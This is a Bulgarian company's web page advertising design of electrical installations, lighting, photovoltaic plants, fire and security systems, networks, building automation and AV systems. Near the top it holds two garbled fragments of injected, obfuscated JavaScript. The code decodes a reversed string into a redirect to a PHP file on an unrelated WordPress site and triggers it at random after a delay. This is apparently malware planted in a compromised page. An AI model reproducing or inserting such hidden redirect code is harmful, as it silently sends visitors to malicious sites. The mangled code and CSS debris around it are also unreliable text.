Проектиране на електрически системи

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1496735366849{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 90px !important;padding-bottom: 90px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}“]

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1513003132296{margin-top: 20px !important;}“]

За своите клиенти и партньори, предлагаме проектиране на:

 

 • Захранващи електрически инсталации в промишлени, обществени и жилищни сгради;
 • Осветителни инсталации в промишлени, обществени и жилищни сгради;
 • Резервни и аварийни захранвания и осветление;
 • Системи за автоматично включване на резервно захранване (АВР);
 • Мълниезащита и заземление;
 • Защита от пренапрежение и понижено напрежение;

 • Осветление на външни пространства: улици, булеварди, паркове;
 • Фасадни, декоративни, ефектни, рекламини и специални осветления;

 • Фотоволтаични централи свързани към енергийната система (ON-GRID);
 • Малки централи за собствени нужди (OFF-GRID);

 • Пожароизвестителни инсталации;
 • Управление на пожарогасителни инсталации;
 • Технически системи за охрана:
  • СОТ в сгради и прилежащи площи;
  • Периметрова охрана на промишлени обекти и частни имоти;
  • Видеонаблюдение с конвенционални и термовизионни камери;
  • Контрол на достъп и присъствие;
  • Контрол и разпознаване на превозни средства;
 • Системи за откриване на утечки в продуктопроводи;
 • Системи за оповестяване и евакуация;

 • Комуникационна локална инфраструктура за пренасяне на глас, данни и видео – структурни кабелни системи, WiFi;
 • Комуникационна инфраструктура между отдалечени обекти – оптична и радио свързаност;
 • Телефонна инфраструктура;
 • Кабелна и спътникова телевизия;

 • Системи за енергиен мениджмънт в търговски, бизнес и жилищни сгради;
 • Управление на осветление, климатизация, вентилация, достъп, озвучаване;
 • Системи за отчитане разходите на електроенергия, топлоенергия и вода;

 • Системи за управление на обекти с програмируеми логически контролери (PLC);
 • Системи за визуализация и контрол на процеси HMI, SCADA;
 • Управление на различни типове електродвигатели, пневматични и хидравлични изпълнителни механизми;
 • Събиране анализ и визуализация на данни от сензори и преобразуватели на физически величини;

 • Интегрирани аудио и видео системи за търговски и конгресни центрове, конферентни зали и хотели;
 • Домашен център за развлечения;
 • Специализирано ефектно озвучаване и осветление в игрални зали;
 • Визуална комуникация на гари, автогари, пристанища, спортни комплекси, търговски центрове;
 • Широкоформатни LED екрани;

 

Нашите специалисти:

 • Членуват в Камара на Инженерите в Инвестиционното Проектиране (КИИП);
 • Притежават Пълна Проектантска Правоспособност;
 • Притежават богат опит в проектирането на обекти от Първа, Втора и по-ниски категории обекти по Закона за устройство на територията (ЗУТ);
 • Притежават сертификати от реномирани производители на електро и комуникационно оборудване: Schneider electric, Legrand, R&M и други;